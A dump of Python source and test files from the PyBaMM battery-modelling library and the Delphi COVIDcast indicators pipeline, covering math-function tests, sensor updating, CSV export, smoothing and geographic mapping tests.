self.assertEqual(fun.evaluate(), np.exp(3))
self.assertEqual(fun.diff(a).evaluate(), np.exp(3))
def test_log(self):
a = pybamm.Scalar(3)
fun = pybamm.log(a)
self.assertIsInstance(fun, pybamm.Log)
self.assertEqual(fun.children[0].id, a.id)
self.assertEqual(fun.evaluate(), np.log(3))
self.assertEqual(fun.diff(a).evaluate(), 1 / 3)
def test_max(self):
a = pybamm.Vector(np.array([1, 2, 3]))
fun = pybamm.max(a)
self.assertIsInstance(fun, pybamm.Function)
self.assertEqual(fun.evaluate(), 3)
def test_min(self):
a = pybamm.Vector(np.array([1, 2, 3]))
fun = pybamm.min(a)
self.assertIsInstance(fun, pybamm.Function)
self.assertEqual(fun.evaluate(), 1)
def test_sin(self):
a = pybamm.Scalar(3)
fun = pybamm.sin(a)
self.assertIsInstance(fun, pybamm.Sin)
self.assertEqual(fun.children[0].id, a.id)
self.assertEqual(fun.evaluate(), np.sin(3))
self.assertEqual(fun.diff(a).evaluate(), np.cos(3))
def test_sinh(self):
a = pybamm.Scalar(3)
fun = pybamm.sinh(a)
self.assertIsInstance(fun, pybamm.Sinh)
self.assertEqual(fun.children[0].id, a.id)
self.assertEqual(fun.evaluate(), np.sinh(3))
self.assertEqual(fun.diff(a).evaluate(), np.cosh(3))
if __name__ == "__main__":
print("Add -v for more debug output")
import sys
if "-v" in sys.argv:
debug = True
pybamm.settings.debug_mode = True
unittest.main()
```
#### File: unit/test_expression_tree/test_interpolant.py
```python
import pybamm
import unittest
import numpy as np
class TestInterpolant(unittest.TestCase):
def test_errors(self):
with self.assertRaisesRegex(ValueError, "data should have exactly two columns"):
pybamm.Interpolant(np.ones(10), None)
with self.assertRaisesRegex(ValueError, "interpolator 'bla' not recognised"):
pybamm.Interpolant(np.ones((10, 2)), None, interpolator="bla")
def test_interpolation(self):
x = np.linspace(0, 1)[:, np.newaxis]
y = pybamm.StateVector(slice(0, 2))
# linear
linear = np.hstack([x, 2 * x])
for interpolator in ["pchip", "cubic spline"]:
interp = pybamm.Interpolant(linear, y, interpolator=interpolator)
np.testing.assert_array_almost_equal(
interp.evaluate(y=np.array([0.397, 1.5]))[:, 0], np.array([0.794, 3])
)
# square
square = np.hstack([x, x ** 2])
y = pybamm.StateVector(slice(0, 1))
for interpolator in ["pchip", "cubic spline"]:
interp = pybamm.Interpolant(square, y, interpolator=interpolator)
np.testing.assert_array_almost_equal(
interp.evaluate(y=np.array([0.397]))[:, 0], np.array([0.397 ** 2])
)
# with extrapolation set to False
for interpolator in ["pchip", "cubic spline"]:
interp = pybamm.Interpolant(
square, y, interpolator=interpolator, extrapolate=False
)
np.testing.assert_array_equal(
interp.evaluate(y=np.array([2]))[:, 0], np.array([np.nan])
)
def test_name(self):
a = pybamm.Symbol("a")
x = np.linspace(0, 1)[:, np.newaxis]
interp = pybamm.Interpolant(np.hstack([x, x]), a, "name")
self.assertEqual(interp.name, "interpolating function (name)")
def test_diff(self):
x = np.linspace(0, 1)[:, np.newaxis]
y = pybamm.StateVector(slice(0, 2))
# linear (derivative should be 2)
linear = np.hstack([x, 2 * x])
for interpolator in ["pchip", "cubic spline"]:
interp_diff = pybamm.Interpolant(linear, y, interpolator=interpolator).diff(
y
)
np.testing.assert_array_almost_equal(
interp_diff.evaluate(y=np.array([0.397, 1.5]))[:, 0], np.array([2, 2])
)
# square (derivative should be 2*x)
square = np.hstack([x, x ** 2])
for interpolator in ["pchip", "cubic spline"]:
interp_diff = pybamm.Interpolant(square, y, interpolator=interpolator).diff(
y
)
np.testing.assert_array_almost_equal(
interp_diff.evaluate(y=np.array([0.397, 0.806]))[:, 0],
np.array([0.794, 1.612]),
decimal=3,
)
if __name__ == "__main__":
print("Add -v for more debug output")
import sys
if "-v" in sys.argv:
debug = True
pybamm.settings.debug_mode = True
unittest.main()
```
#### File: unit/test_expression_tree/test_vector.py
```python
import pybamm
import numpy as np
import unittest
class TestVector(unittest.TestCase):
def setUp(self):
self.x = np.array([[1], [2], [3]])
self.vect = pybamm.Vector(self.x)
def test_array_wrapper(self):
self.assertEqual(self.vect.ndim, 2)
self.assertEqual(self.vect.shape, (3, 1))
self.assertEqual(self.vect.size, 3)
def test_column_reshape(self):
vect1d = pybamm.Vector(np.array([1, 2, 3]))
np.testing.assert_array_equal(self.vect.entries, vect1d.entries)
def test_vector_evaluate(self):
np.testing.assert_array_equal(self.vect.evaluate(), self.x)
def test_vector_operations(self):
np.testing.assert_array_equal((self.vect + self.vect).evaluate(), 2 * self.x)
np.testing.assert_array_equal((self.vect - self.vect).evaluate(), 0 * self.x)
np.testing.assert_array_equal(
(self.vect * self.vect).evaluate(), np.array([[1], [4], [9]])
)
def test_vector_modification(self):
exp = self.vect * self.vect + self.vect
self.x[0] = -1
self.assertEqual(exp.children[1]._entries[0], -1)
self.assertEqual(exp.children[0].children[0]._entries[0], -1)
self.assertEqual(exp.children[0].children[1]._entries[0], -1)
def test_wrong_size_entries(self):
with self.assertRaisesRegex(
ValueError, "Entries must have 1 dimension or be column vector"
):
pybamm.Vector(np.ones((4, 5)))
if __name__ == "__main__":
print("Add -v for more debug output")
import sys
if "-v" in sys.argv:
debug = True
pybamm.settings.debug_mode = True
unittest.main()
```
#### File: test_interface/test_kinetics/test_tafel.py
```python
import pybamm
import unittest
class TestTafel(unittest.TestCase):
def test_forward_tafel(self):
submodel = pybamm.interface.kinetics.ForwardTafel(None, None)
j = submodel._get_kinetics(pybamm.Scalar(1), pybamm.Scalar(1), pybamm.Scalar(1))
self.assertIsInstance(j, pybamm.Symbol)
def test_backward_tafel(self):
submodel = pybamm.interface.kinetics.BackwardTafel(None, None)
j = submodel._get_kinetics(pybamm.Scalar(1), pybamm.Scalar(1), pybamm.Scalar(1))
self.assertIsInstance(j, pybamm.Symbol)
if __name__ == "__main__":
print("Add -v for more debug output")
import sys
if "-v" in sys.argv:
debug = True
pybamm.settings.debug_mode = True
unittest.main()
```
#### File: unit/test_solvers/test_base_solver.py
```python
import pybamm
import unittest
class TestBaseSolver(unittest.TestCase):
def test_base_solver_init(self):
solver = pybamm.BaseSolver(rtol=1e-2, atol=1e-4)
self.assertEqual(solver.rtol, 1e-2)
self.assertEqual(solver.atol, 1e-4)
solver.rtol = 1e-5
self.assertEqual(solver.rtol, 1e-5)
solver.rtol = 1e-7
self.assertEqual(solver.rtol, 1e-7)
with self.assertRaises(NotImplementedError):
solver.compute_solution(None, None)
with self.assertRaises(NotImplementedError):
solver.set_up(None)
def test_step_or_solve_empty_model(self):
model = pybamm.BaseModel()
solver = pybamm.BaseSolver()
with self.assertRaisesRegex(pybamm.ModelError, "Cannot step empty model"):
solver.step(model, None)
with self.assertRaisesRegex(pybamm.ModelError, "Cannot solve empty model"):
solver.solve(model, None)
if __name__ == "__main__":
print("Add -v for more debug output")
import sys
if "-v" in sys.argv:
debug = True
pybamm.settings.debug_mode = True
unittest.main()
```
#### File: tests/unit/test_util.py
```python
import numpy as np
import os
import pybamm
import unittest
class TestUtil(unittest.TestCase):
"""
Test the functionality in util.py
"""
def test_load_function(self):
# Test filename ends in '.py'
with self.assertRaisesRegex(
ValueError, "Expected filename.py, but got doesnotendindotpy"
):
pybamm.load_function("doesnotendindotpy")
# Test exception if absolute file not found
with self.assertRaisesRegex(
ValueError, "is an absolute path, but the file is not found"
):
nonexistent_abs_file = os.path.join(os.getcwd(), "i_dont_exist.py")
pybamm.load_function(nonexistent_abs_file)
# Test exception if relative file not found
with self.assertRaisesRegex(
ValueError, "cannot be found in the PyBaMM directory"
):
pybamm.load_function("i_dont_exist.py")
# Test exception if relative file found more than once
with self.assertRaisesRegex(
ValueError, "found multiple times in the PyBaMM directory"
):
pybamm.load_function("__init__.py")
# Test exception if no matching function found in module
with self.assertRaisesRegex(ValueError, "No function .+ found in module .+"):
pybamm.load_function("process_symbol_bad_function.py")
# Test function load with absolute path
abs_test_path = os.path.join(
os.getcwd(),
"tests",
"unit",
"test_parameters",
"data",
"process_symbol_test_function.py",
)
self.assertTrue(os.path.isfile(abs_test_path))
func = pybamm.load_function(abs_test_path)
self.assertEqual(func(2), 246)
# Test function load with relative path
func = pybamm.load_function("process_symbol_test_function.py")
self.assertEqual(func(3), 369)
def test_rmse(self):
self.assertEqual(pybamm.rmse(np.ones(5), np.zeros(5)), 1)
self.assertEqual(pybamm.rmse(2 * np.ones(5), np.zeros(5)), 2)
self.assertEqual(pybamm.rmse(2 * np.ones(5), np.ones(5)), 1)
x = np.array([1, 2, 3, 4, 5])
self.assertEqual(pybamm.rmse(x, x), 0)
with self.assertRaisesRegex(ValueError, "same length"):
pybamm.rmse(np.ones(5), np.zeros(3))
def test_infinite_nested_dict(self):
d = pybamm.get_infinite_nested_dict()
d[1][2][3] = "x"
self.assertEqual(d[1][2][3], "x")
d[4][5] = "y"
self.assertEqual(d[4][5], "y")
if __name__ == "__main__":
print("Add -v for more debug output")
import sys
if "-v" in sys.argv:
debug = True
pybamm.settings.debug_mode = True
unittest.main()
```
|
{
"source": "JedGrabman/covidcast-indicators",
"score": 2
}
|
#### File: changehc/delphi_changehc/update_sensor.py
```python
import logging
from multiprocessing import Pool, cpu_count
import covidcast
from delphi_utils import GeoMapper, S3ArchiveDiffer, read_params
# third party
import numpy as np
import pandas as pd
# first party
from .config import Config, Constants
from .load_data import load_combined_data
from .sensor import CHCSensor
from .weekday import Weekday
from .constants import SIGNALS, SMOOTHED, SMOOTHED_ADJ, NA
def write_to_csv(output_dict, write_se, out_name, output_path="."):
"""Write sensor values to csv.
Args:
output_dict: dictionary containing sensor rates, se, unique dates, and unique geo_id
write_se: boolean to write out standard errors, if true, use an obfuscated name
out_name: name of the output file
output_path: outfile path to write the csv (default is current directory)
"""
if write_se:
logging.info(f"========= WARNING: WRITING SEs TO {out_name} =========")
geo_level = output_dict["geo_level"]
dates = output_dict["dates"]
geo_ids = output_dict["geo_ids"]
all_rates = output_dict["rates"]
all_se = output_dict["se"]
all_include = output_dict["include"]
out_n = 0
for i, d in enumerate(dates):
filename = "%s/%s_%s_%s.csv" % (
output_path,
(d + Config.DAY_SHIFT).strftime("%Y%m%d"),
geo_level,
out_name,
)
with open(filename, "w") as outfile:
outfile.write("geo_id,val,se,direction,sample_size\n")
for geo_id in geo_ids:
sensor = all_rates[geo_id][i]
se = all_se[geo_id][i]
if all_include[geo_id][i]:
assert not np.isnan(sensor), "value for included sensor is nan"
assert not np.isnan(se), "se for included sensor is nan"
if sensor > 90:
logging.warning(f"value suspiciously high, {geo_id}: {sensor}")
assert se < 5, f"se suspiciously high, {geo_id}: {se}"
if write_se:
assert sensor > 0 and se > 0, "p=0, std_err=0 invalid"
outfile.write(
"%s,%f,%s,%s,%s\n" % (geo_id, sensor, se, NA, NA))
else:
# for privacy reasons we will not report the standard error
outfile.write(
"%s,%f,%s,%s,%s\n" % (geo_id, sensor, NA, NA, NA)
)
out_n += 1
logging.debug(f"wrote {out_n} rows for {len(geo_ids)} {geo_level}")
def add_prefix(signal_names, wip_signal, prefix="wip_"):
"""Adds prefix to signal if there is a WIP signal
Parameters
----------
signal_names: List[str]
Names of signals to be exported
wip_signal : List[str] or bool
a list of wip signals: [], OR
all signals in the registry: True OR
only signals that have never been published: False
prefix : 'wip_'
prefix for new/non public signals
Returns
-------
List of signal names
wip/non wip signals for further computation
"""
if wip_signal is True:
return [prefix + signal for signal in signal_names]
if isinstance(wip_signal, list):
make_wip = set(wip_signal)
return [
prefix + signal if signal in make_wip else signal
for signal in signal_names
]
if wip_signal in {False, ""}:
return [
signal if public_signal(signal)
else prefix + signal
for signal in signal_names
]
raise ValueError("Supply True | False or '' or [] | list()")
def public_signal(signal_):
"""Checks if the signal name is already public using COVIDcast
Parameters
----------
signal_ : str
Name of the signal
Returns
-------
bool
True if the signal is present
False if the signal is not present
"""
epidata_df = covidcast.metadata()
for index in range(len(epidata_df)):
if epidata_df['signal'][index] == signal_:
return True
return False
class CHCSensorUpdator:
"""Contains methods to update sensor and write results to csv
"""
def __init__(self,
startdate,
enddate,
dropdate,
geo,
parallel,
weekday,
se):
"""Init Sensor Updator
Args:
startdate: first sensor date (YYYY-mm-dd)
enddate: last sensor date (YYYY-mm-dd)
dropdate: data drop date (YYYY-mm-dd)
geo: geographic resolution, one of ["county", "state", "msa", "hrr"]
parallel: boolean to run the sensor update in parallel
weekday: boolean to adjust for weekday effects
se: boolean to write out standard errors, if true, use an obfuscated name
"""
self.startdate, self.enddate, self.dropdate = [pd.to_datetime(t) for t in (startdate, enddate, dropdate)]
# handle dates
assert (self.startdate > (Config.FIRST_DATA_DATE + Config.BURN_IN_PERIOD)
), f"not enough data to produce estimates starting {self.startdate}"
assert self.startdate < self.enddate, "start date >= end date"
assert self.enddate <= self.dropdate, "end date > drop date"
assert geo in ['county', 'state', 'msa', 'hrr'], f"{geo} is invalid, pick one of 'county', 'state', 'msa', 'hrr'"
self.geo, self.parallel, self.weekday, self.se = geo.lower(), parallel, weekday, se
# output file naming
signals = SIGNALS.copy()
signals.remove(SMOOTHED if self.weekday else SMOOTHED_ADJ)
signal_names = add_prefix(
signals,
wip_signal=read_params()["wip_signal"])
self.updated_signal_names = signal_names
def shift_dates(self):
"""shift estimates forward to account for time lag, compute burnindates, sensordates
"""
drange = lambda s, e: pd.date_range(start=s,periods=(e-s).days,freq='D')
self.startdate = self.startdate - Config.DAY_SHIFT
self.burnindate = self.startdate - Config.BURN_IN_PERIOD
self.fit_dates = drange(Config.FIRST_DATA_DATE, self.dropdate)
self.burn_in_dates = drange(self.burnindate, self.dropdate)
self.sensor_dates = drange(self.startdate, self.enddate)
return True
def geo_reindex(self, data):
"""Reindex based on geography, include all date, geo pairs
Args:
data: dataframe, the output of loadcombineddata
staticpath: path for the static geographic files
Returns:
dataframe
"""
# get right geography
geo = self.geo
gmpr = GeoMapper()
if geo not in {"county", "state", "msa", "hrr"}:
logging.error(f"{geo} is invalid, pick one of 'county', 'state', 'msa', 'hrr'")
return False
if geo == "county":
data_frame = gmpr.fips_to_megacounty(data,Config.MIN_DEN,Config.MAX_BACKFILL_WINDOW,thr_col="den",mega_col=geo)
elif geo == "state":
data_frame = gmpr.replace_geocode(data, "fips", "state_id", new_col="state")
elif geo == "msa":
data_frame = gmpr.replace_geocode(data, "fips", "msa")
elif geo == "hrr":
data_frame = gmpr.replace_geocode(data, "fips", "hrr")
self.unique_geo_ids = pd.unique(data_frame[geo])
data_frame.set_index([geo, Config.DATE_COL],inplace=True)
# for each location, fill in all missing dates with 0 values
multiindex = pd.MultiIndex.from_product((self.unique_geo_ids, self.fit_dates),
names=[geo, Config.DATE_COL])
assert (len(multiindex) <= (Constants.MAX_GEO[geo] * len(self.fit_dates))
), "more loc-date pairs than maximum number of geographies x number of dates"
# fill dataframe with missing dates using 0
data_frame = data_frame.reindex(multiindex, fill_value=0)
data_frame.fillna(0, inplace=True)
return data_frame
def update_sensor(self,
denom_filepath,
covid_filepath,
outpath,
staticpath):
"""Generate sensor values, and write to csv format.
Args:
denom_filepath: path to the aggregated denominator data
covid_filepath: path to the aggregated covid data
outpath: output path for the csv results
staticpath: path for the static geographic files
"""
self.shift_dates()
final_sensor_idxs = (self.burn_in_dates >= self.startdate) & (self.burn_in_dates <= self.enddate)
# load data
base_geo = "fips"
data = load_combined_data(denom_filepath, covid_filepath, self.dropdate, base_geo)
data.reset_index(inplace=True)
data_frame = self.geo_reindex(data)
# handle if we need to adjust by weekday
wd_params = Weekday.get_params(data_frame) if self.weekday else None
# run sensor fitting code (maybe in parallel)
sensor_rates = {}
sensor_se = {}
sensor_include = {}
if not self.parallel:
for geo_id, sub_data in data_frame.groupby(level=0):
sub_data.reset_index(level=0,inplace=True)
if self.weekday:
sub_data = Weekday.calc_adjustment(wd_params, sub_data)
res = CHCSensor.fit(sub_data, self.burnindate, geo_id)
res = pd.DataFrame(res)
sensor_rates[geo_id] = np.array(res.loc[final_sensor_idxs,"rate"])
sensor_se[geo_id] = np.array(res.loc[final_sensor_idxs,"se"])
sensor_include[geo_id] = np.array(res.loc[final_sensor_idxs,"incl"])
else:
n_cpu = min(10, cpu_count())
logging.debug(f"starting pool with {n_cpu} workers")
with Pool(n_cpu) as pool:
pool_results = []
for geo_id, sub_data in data_frame.groupby(level=0,as_index=False):
sub_data.reset_index(level=0, inplace=True)
if self.weekday:
sub_data = Weekday.calc_adjustment(wd_params, sub_data)
pool_results.append(
pool.apply_async(
CHCSensor.fit, args=(sub_data, self.burnindate, geo_id,),
)
)
pool_results = [proc.get() for proc in pool_results]
for res in pool_results:
geo_id = res["geo_id"]
res = pd.DataFrame(res)
sensor_rates[geo_id] = np.array(res.loc[final_sensor_idxs, "rate"])
sensor_se[geo_id] = np.array(res.loc[final_sensor_idxs, "se"])
sensor_include[geo_id] = np.array(res.loc[final_sensor_idxs, "incl"])
unique_geo_ids = list(sensor_rates.keys())
output_dict = {
"rates": sensor_rates,
"se": sensor_se,
"dates": self.sensor_dates,
"geo_ids": unique_geo_ids,
"geo_level": self.geo,
"include": sensor_include,
}
# write out results
for signal in self.updated_signal_names:
write_to_csv(output_dict, self.se, signal, outpath)
logging.debug(f"wrote files to {outpath}")
params = read_params()
'''
arch_diff = S3ArchiveDiffer(
params["cache_dir"],
params["export_dir"],
params["bucket_name"], "chc",
params["aws_credentials"])
arch_diff.update_cache()
_, common_diffs, new_files = arch_diff.diff_exports()
# Archive changed and new files only
to_archive = [f for f, diff in common_diffs.items() if diff is not None]
to_archive += new_files
_, fails = arch_diff.archive_exports(to_archive)
print(fails)
# Filter existing exports to exclude those that failed to archive
succ_common_diffs = {f: diff for f, diff in common_diffs.items() if f not in fails}
arch_diff.filter_exports(succ_common_diffs)
# Report failures: someone should probably look at them
for exported_file in fails:
print(f"Failed to archive '{exported_file}'")
'''
```
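The `wip_signal` modes of `add_prefix` can be checked directly: `True` prefixes every name, a list prefixes only the listed names, and `False`/`""` prefixes only signals absent from the COVIDcast metadata (omitted here because it needs a network call). The signal names below are illustrative, not the real registry:
```python
from delphi_changehc.update_sensor import add_prefix  # assumes package is installed

names = ["smoothed_cli", "smoothed_adj_cli"]  # illustrative names
print(add_prefix(names, wip_signal=True))
# ['wip_smoothed_cli', 'wip_smoothed_adj_cli']
print(add_prefix(names, wip_signal=["smoothed_cli"]))
# ['wip_smoothed_cli', 'smoothed_adj_cli']
```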
#### File: changehc/tests/test_load_data.py
```python
import pytest
# third party
from delphi_utils import read_params
import pandas as pd
# first party
from delphi_changehc.config import Config, Constants
from delphi_changehc.load_data import *
CONFIG = Config()
CONSTANTS = Constants()
PARAMS = read_params()
COVID_FILEPATH = PARAMS["input_covid_file"]
DENOM_FILEPATH = PARAMS["input_denom_file"]
DROP_DATE = pd.to_datetime(PARAMS["drop_date"])
class TestLoadData:
denom_data = load_denom_data(DENOM_FILEPATH, DROP_DATE, "fips")
covid_data = load_covid_data(COVID_FILEPATH, DROP_DATE, "fips")
combined_data = load_combined_data(DENOM_FILEPATH, COVID_FILEPATH, DROP_DATE,
"fips")
def test_base_unit(self):
with pytest.raises(AssertionError):
load_denom_data(DENOM_FILEPATH, DROP_DATE, "foo")
with pytest.raises(AssertionError):
load_denom_data("test_data/20200101_foo.dat", DROP_DATE, "fips")
with pytest.raises(AssertionError):
load_covid_data(COVID_FILEPATH, DROP_DATE, "foo")
with pytest.raises(AssertionError):
load_covid_data("test_data/20200101_foo.dat", DROP_DATE, "fips")
with pytest.raises(AssertionError):
load_combined_data(DENOM_FILEPATH, COVID_FILEPATH, DROP_DATE, "foo")
def test_denom_columns(self):
assert "fips" in self.denom_data.index.names
assert "date" in self.denom_data.index.names
expected_denom_columns = ["Denominator"]
for col in expected_denom_columns:
assert col in self.denom_data.columns
assert len(set(self.denom_data.columns) - set(expected_denom_columns)) == 0
def test_claims_columns(self):
assert "fips" in self.covid_data.index.names
assert "date" in self.covid_data.index.names
expected_covid_columns = ["COVID"]
for col in expected_covid_columns:
assert col in self.covid_data.columns
assert len(set(self.covid_data.columns) - set(expected_covid_columns)) == 0
def test_combined_columns(self):
assert "fips" in self.combined_data.index.names
assert "date" in self.combined_data.index.names
expected_combined_columns = ["num", "den"]
for col in expected_combined_columns:
assert col in self.combined_data.columns
assert len(
set(self.combined_data.columns) - set(expected_combined_columns)) == 0
def test_edge_values(self):
for data in [self.denom_data,
self.covid_data,
self.combined_data]:
assert data.index.get_level_values('date').max() >= Config.FIRST_DATA_DATE
assert data.index.get_level_values('date').min() < DROP_DATE
def test_fips_values(self):
for data in [self.denom_data,
self.covid_data,
self.combined_data]:
assert (
len(data.index.get_level_values(
'fips').unique()) <= CONSTANTS.NUM_COUNTIES
)
def test_combined_fips_values(self):
assert self.combined_data.isna().sum().sum() == 0
sum_fips_num = (
self.covid_data["COVID"].sum()
)
sum_fips_den = (
self.denom_data["Denominator"].sum()
)
assert self.combined_data["num"].sum() == sum_fips_num
assert self.combined_data["den"].sum() == sum_fips_den
```
#### File: claims_hosp/delphi_claims_hosp/smooth.py
```python
import numpy as np
from .config import Config
def left_gauss_linear(arr, bandwidth=Config.SMOOTHER_BANDWIDTH):
"""
Smooth the y-values using a local linear left Gaussian filter.
Args:
arr: one dimensional signal to smooth.
bandwidth: smoothing bandwidth (in terms of variance)
Returns: a smoothed 1D signal.
"""
n_rows = len(arr)
out_arr = np.zeros_like(arr)
X = np.vstack([np.ones(n_rows), np.arange(n_rows)]).T
for idx in range(n_rows):
weights = np.exp(-((np.arange(idx + 1) - idx) ** 2) / bandwidth)
XwX = np.dot(X[: (idx + 1), :].T * weights, X[: (idx + 1), :])
Xwy = np.dot(X[: (idx + 1), :].T * weights, arr[: (idx + 1)].reshape(-1, 1))
try:
beta = np.linalg.solve(XwX, Xwy)
out_arr[idx] = np.dot(X[: (idx + 1), :], beta)[-1]
except np.linalg.LinAlgError:
out_arr[idx] = np.nan
return out_arr
```
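Because `left_gauss_linear` fits a local line, an exactly linear signal passes through unchanged; the very first point has only one observation to fit, so the singular-matrix branch returns NaN there. A quick check, assuming the package is importable:
```python
import numpy as np
from delphi_claims_hosp.smooth import left_gauss_linear  # assumes package is installed

signal = np.arange(20, dtype=float)  # exactly linear input
smoothed = left_gauss_linear(signal, bandwidth=100)
print(np.isnan(smoothed[0]))                  # True: one point cannot fix a line
print(np.allclose(smoothed[1:], signal[1:]))  # True: linear signals are preserved
```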
#### File: _delphi_utils_python/delphi_utils/utils.py
```python
from json import load
from os.path import exists
from shutil import copyfile
def read_params():
"""Reads a file named 'params.json' in the current working directory.
If the file does not exist, it copies the file 'params.json.template' to
'params.json' and then reads the file.
"""
if not exists("params.json"):
copyfile("params.json.template", "params.json")
with open("params.json", "r") as json_file:
return load(json_file)
```
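`read_params` is called the same way across all the indicators; a typical call site looks like the sketch below (key names vary by indicator, `export_dir` being the most common):
```python
from delphi_utils import read_params

params = read_params()             # copies params.json.template on first run
export_dir = params["export_dir"]  # key set depends on the indicator's template
```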
#### File: _delphi_utils_python/tests/test_geomap.py
```python
from delphi_utils.geomap import GeoMapper
import pytest
import pandas as pd
import numpy as np
class TestGeoMapper:
fips_data = pd.DataFrame(
{
"fips": ["01123", "02340", "98633", "18181"],
"date": [pd.Timestamp("2018-01-01")] * 4,
"count": [2, 0, 20, 10021],
"total": [4, 0, 400, 100001],
}
)
fips_data_2 = pd.DataFrame(
{
"fips": ["01123", "02340", "02002", "18633", "18181"],
"date": [pd.Timestamp("2018-01-01")] * 5,
"count": [2, 1, 20, np.nan, 10021],
"total": [4, 1, 400, np.nan, 100001],
}
)
fips_data_3 = pd.DataFrame(
{
"fips": ["48059", "48253", "48441", "72003", "72005", "10999"],
"date": [pd.Timestamp("2018-01-01")] * 3 + [pd.Timestamp("2018-01-03")] * 3,
"count": [1, 2, 3, 4, 8, 5],
"total": [2, 4, 7, 11, 100, 10],
}
)
fips_data_4 = pd.DataFrame(
{
"fips": ["01123", "48253", "72003", "18181"],
"date": [pd.Timestamp("2018-01-01")] * 4,
"count": [2, 1, np.nan, 10021],
"total": [4, 1, np.nan, 100001],
}
)
fips_data_5 = pd.DataFrame(
{
"fips": [1123, 48253, 72003, 18181],
"date": [pd.Timestamp("2018-01-01")] * 4,
"count": [2, 1, np.nan, 10021],
"total": [4, 1, np.nan, 100001],
}
)
zip_data = pd.DataFrame(
{
"zip": ["45140", "95616", "95618"] * 2,
"date": [pd.Timestamp("2018-01-01")] * 3 + [pd.Timestamp("2018-01-03")] * 3,
"count": [99, 345, 456, 100, 344, 442],
}
)
zip_data["total"] = zip_data["count"] * 2
jan_month = pd.bdate_range("2018-01-01", "2018-02-01")
mega_data = pd.concat(
(
pd.DataFrame(
{
"fips": ["01001"] * len(jan_month),
"date": jan_month,
"count": np.arange(len(jan_month)),
"visits": np.arange(len(jan_month)),
}
),
pd.DataFrame(
{
"fips": ["01002"] * len(jan_month),
"date": jan_month,
"count": np.arange(len(jan_month)),
"visits": 2 * np.arange(len(jan_month)),
}
),
)
)
mega_data_2 = pd.concat(
(
pd.DataFrame(
{
"fips": ["01001"] * len(jan_month),
"date": jan_month,
"count": np.arange(len(jan_month)),
"_thr_col_roll": np.arange(len(jan_month)),
}
),
pd.DataFrame(
{
"fips": [11001] * len(jan_month),
"date": jan_month,
"count": np.arange(len(jan_month)),
"_thr_col_roll": np.arange(len(jan_month)),
}
),
)
)
jhu_uid_data = pd.DataFrame(
{
"jhu_uid": [
84048315,
84048137,
84013299,
84013299,
84070002,
84000013,
84090002,
],
"date": [pd.Timestamp("2018-01-01")] * 3
+ [pd.Timestamp("2018-01-03")] * 3
+ [pd.Timestamp("2018-01-01")],
"count": [1, 2, 3, 4, 8, 5, 20],
"total": [2, 4, 7, 11, 100, 10, 40],
}
)
# jhu_big_data = pd.read_csv("test_dir/small_deaths.csv")
# Loading tests updated 8/26
def test_crosswalks(self):
# These tests ensure that the one-to-many crosswalks have properly normalized weights
gmpr = GeoMapper()
# FIPS -> HRR is allowed to be an incomplete mapping, since only a fraction of a FIPS
# code can not belong to an HRR
cw = gmpr._load_crosswalk(from_code="fips", to_code="hrr")
assert (
cw.groupby("fips")["weight"].sum().round(5).ge(0.95).all()
) # some weight discrepancy is fine for HRR
cw = gmpr._load_crosswalk(from_code="fips", to_code="zip")
assert cw.groupby("fips")["weight"].sum().round(5).eq(1.0).all()
cw = gmpr._load_crosswalk(from_code="jhu_uid", to_code="fips")
assert cw.groupby("jhu_uid")["weight"].sum().round(5).eq(1.0).all()
cw = gmpr._load_crosswalk(from_code="zip", to_code="fips")
assert cw.groupby("zip")["weight"].sum().round(5).eq(1.0).all()
# weight discrepancy is fine for MSA, for the same reasons as HRR
# cw = gmpr.load_crosswalk(from_code="zip", to_code="msa")
# assert cw.groupby("zip")["weight"].sum().round(5).eq(1.0).all()
cw = gmpr._load_crosswalk(from_code="zip", to_code="state")
assert cw.groupby("zip")["weight"].sum().round(5).eq(1.0).all()
def test_load_zip_fips_table(self):
gmpr = GeoMapper()
fips_data = gmpr._load_crosswalk(from_code="zip", to_code="fips")
assert set(fips_data.columns) == set(["zip", "fips", "weight"])
assert pd.api.types.is_string_dtype(fips_data.zip)
assert pd.api.types.is_string_dtype(fips_data.fips)
assert pd.api.types.is_float_dtype(fips_data.weight)
def test_load_state_table(self):
gmpr = GeoMapper()
state_data = gmpr._load_crosswalk(from_code="state", to_code="state")
assert tuple(state_data.columns) == ("state_code", "state_id", "state_name")
assert state_data.shape[0] == 60
def test_load_fips_msa_table(self):
gmpr = GeoMapper()
msa_data = gmpr._load_crosswalk(from_code="fips", to_code="msa")
assert tuple(msa_data.columns) == ("fips", "msa")
def test_load_jhu_uid_fips_table(self):
gmpr = GeoMapper()
jhu_data = gmpr._load_crosswalk(from_code="jhu_uid", to_code="fips")
assert (jhu_data.groupby("jhu_uid").sum() == 1).all()[0]
def test_load_zip_hrr_table(self):
gmpr = GeoMapper()
zip_data = gmpr._load_crosswalk(from_code="zip", to_code="hrr")
assert pd.api.types.is_string_dtype(zip_data["zip"])
assert pd.api.types.is_string_dtype(zip_data["hrr"])
def test_convert_fips_to_state_code(self):
gmpr = GeoMapper()
new_data = gmpr.convert_fips_to_state_code(self.fips_data)
assert new_data["state_code"].dtype == "O"
assert new_data.loc[1, "state_code"] == new_data.loc[1, "fips"][:2]
def test_fips_to_state_code(self):
gmpr = GeoMapper()
new_data = gmpr.fips_to_state_code(self.fips_data_3)
assert np.allclose(new_data["count"].sum(), self.fips_data_3["count"].sum())
def test_convert_state_code_to_state_id(self):
gmpr = GeoMapper()
new_data = gmpr.convert_fips_to_state_code(self.fips_data)
new_data = gmpr.convert_state_code_to_state_id(new_data)
assert new_data["state_id"].isnull()[2]
assert new_data["state_id"][3] == "in"
assert len(pd.unique(new_data["state_id"])) == 4
def test_fips_to_state_id(self):
gmpr = GeoMapper()
new_data = gmpr.fips_to_state_id(self.fips_data_2)
assert new_data["state_id"][2] == "in"
assert new_data.shape[0] == 3
assert new_data["count"].sum() == self.fips_data_2["count"].sum()
def test_fips_to_msa(self):
gmpr = GeoMapper()
new_data = gmpr.fips_to_msa(self.fips_data_3)
assert new_data.shape[0] == 2
assert new_data["msa"][0] == "10180"
new_data = gmpr.fips_to_msa(self.fips_data_3, create_mega=True)
assert new_data[["count"]].sum()[0] == self.fips_data_3["count"].sum()
def test_zip_to_fips(self):
gmpr = GeoMapper()
new_data = gmpr.zip_to_fips(self.zip_data)
assert new_data.shape[0] == 10
assert (
new_data[["count", "total"]].sum() - self.zip_data[["count", "total"]].sum()
).sum() < 1e-3
def test_megacounty(self):
gmpr = GeoMapper()
new_data = gmpr.fips_to_megacounty(self.mega_data, 6, 50)
assert (
new_data[["count", "visits"]].sum()
- self.mega_data[["count", "visits"]].sum()
).sum() < 1e-3
with pytest.raises(ValueError):
new_data = gmpr.megacounty_creation(
